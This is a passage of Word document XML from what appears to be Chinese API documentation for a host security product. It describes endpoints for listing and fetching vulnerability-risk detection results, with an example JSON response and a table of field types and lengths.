            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="598A3E96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42D23AC7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59638AC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ACECD20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AA03B9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001BBA99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>"执行中;成功;失败"，最近一次job执行状态，如果从未执行过job，状态为Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1625AACE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="查询风险检测结果-1"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r>
        <w:t>查询风险检测结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E165FC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B651EF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/ {app|system|access|account}/linux/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716118F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35075056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>公共参数（详情参见</w:t>
      </w:r>
      <w:hyperlink w:anchor="基本请求方法">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>基本请求方法</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1CB48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E007367" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/app/linux/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72582622" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBDFF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">           {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "526fb2d7dd5ec7e9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.5.118",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.5.118",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.5.118",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "qingtenggroup",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "所有ip范围"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "qingteng.qingteng.cn",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5b3a8b567d761b22befc8e16",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT032016001411",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548BB2B6"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694"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7C8A216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E53E1DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="430C846C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5240F25C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="209E8612" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5168852A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A3137F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D3D4285" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="222DB3D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E5942E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41E96E60" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C96FA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17CD39E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="373228E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A5820A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46982613" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333C2C32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26785368" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71247D11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FDEEF89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F708593" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F96F6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D34C891" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CFF5B4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B5ED078" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A03CFE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC14D85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04C79733" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7800359F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B161A82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76C25284" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F4BD996" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE73551" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF55EDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3344F045" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E107E28" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17E48EC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3646802C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49AFF8F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EEE1109" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40532C48" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C48FFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D48D03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19329D76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45CF6499" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23B875F1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51D692CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCAE212" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154FA256" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B136FE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0048B269" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7691588B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40FEBCF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A41BF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD06F40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="142C8947" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF1168B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EFADFBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596626A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EE5E26F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EC0DDFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B9B312D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBA50A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B5178C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F551985" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DE6F302" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2810B7C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24674614" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28F83F9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56AD3569" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单(true/false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="300562DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="查询风险详情-1"/>
      <w:bookmarkEnd w:id="99"/>
      <w:r>
        <w:t>查询风险详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE17D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D57A5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/ {app|system|access|account}/linux/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C3DA70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FCB4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274780A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E3551" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
